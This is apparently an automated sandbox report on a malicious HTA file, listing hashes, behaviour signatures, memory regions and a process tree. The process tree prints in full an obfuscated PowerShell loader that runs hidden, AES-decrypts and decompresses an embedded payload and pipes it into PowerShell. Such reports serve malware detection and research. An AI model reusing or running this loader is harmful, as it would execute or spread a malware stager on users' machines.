Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/SCAN-atoletter3.hta

  • Size

    1.1MB

  • MD5

    65a82ba108814502f8de8f9c918c1637

  • SHA1

    81bb281aff6d485787f79558b2433a529af5d53b

  • SHA256

    dceca8e7f6baca5bd3417c0e05a1e9e934a0c72fe36c79fd3aca451ea2168d76

  • SHA512

    477a94c061e96c5b8cdc256e746eb9dbd57339c93bcbd90bb66e2b6d21a7ff9e35b3b0ac7eac7a4c2b308306b06178060c38bce1470f5d94af32d07a97ce2621

  • SSDEEP

    1536:MUQr+podgEt/pvBYwPBONWBImr/l1vcmafSIm+lIWFWY7Cy5h7OIxeZeDG52VP+q:ArooW8vhXBHuV

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter3.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2936

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    e48a97a467b211d779a3fa243de18052

    SHA1

    1571d8f952049f07ae62b25907c1639424112db9

    SHA256

    bfc8cbd8fb88c0e5347d60db6b6873b5e1527c4f87b6b6f83374f2139507c413

    SHA512

    43ad54e46b86a6ff7ed2fa235150bacbd6efca297e3e0640d13259e784f99bb71af0a71c9ea9193e4071b53cc8686a8d3317e0b73b9b72c27210a1544c7a74cf

  • memory/2376-2-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-4-0x0000000001F90000-0x0000000001FD0000-memory.dmp

    Filesize

    256KB

  • memory/2376-3-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-5-0x0000000001F90000-0x0000000001FD0000-memory.dmp

    Filesize

    256KB

  • memory/2376-6-0x0000000001F90000-0x0000000001FD0000-memory.dmp

    Filesize

    256KB

  • memory/2376-7-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2764-19-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2764-14-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2764-20-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2764-23-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2764-24-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2764-37-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2936-22-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2936-21-0x0000000002840000-0x0000000002880000-memory.dmp

    Filesize

    256KB

  • memory/2936-25-0x0000000002840000-0x0000000002880000-memory.dmp

    Filesize

    256KB

  • memory/2936-26-0x0000000002840000-0x0000000002880000-memory.dmp

    Filesize

    256KB

  • memory/2936-27-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2936-38-0x0000000072790000-0x0000000072D3B000-memory.dmp

    Filesize

    5.7MB